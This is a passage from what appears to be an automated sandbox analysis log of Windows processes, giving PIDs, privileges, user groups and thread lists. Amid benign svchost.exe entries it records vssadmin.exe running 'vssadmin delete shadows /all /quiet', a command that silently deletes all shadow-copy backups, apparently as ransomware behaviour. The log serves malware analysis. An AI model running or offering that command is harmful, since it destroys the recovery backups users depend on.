"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001684b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 60 os_tid = 0xe74 Thread: id = 62 os_tid = 0xe7c Thread: id = 66 os_tid = 0xe8c Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x79579000" os_pid = "0x5a4" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x24c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000fd42" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 67 os_tid = 0xa8c Thread: id = 68 os_tid = 0xa88 Thread: id = 69 os_tid = 0x9fc Thread: id = 70 os_tid = 0x9f8 Thread: id = 71 os_tid = 0x9f4 Thread: id = 72 os_tid = 0x664 Thread: id = 73 os_tid = 0x660 Thread: id = 74 os_tid = 0x624 Thread: id = 75 os_tid = 0x620 Thread: id = 76 os_tid = 0x61c Thread: id = 77 os_tid = 0x5a8 Process: id = "11" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x2d378000" os_pid = "0xeb0" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xddc" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001684b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 78 os_tid = 0xeb4 Thread: id = 79 os_tid = 0xeb8 Thread: id = 80 os_tid = 0xec4 Thread: id = 81 os_tid = 0xed4 Thread: id = 82 os_tid = 0xedc Thread: id = 83 os_tid = 0xee0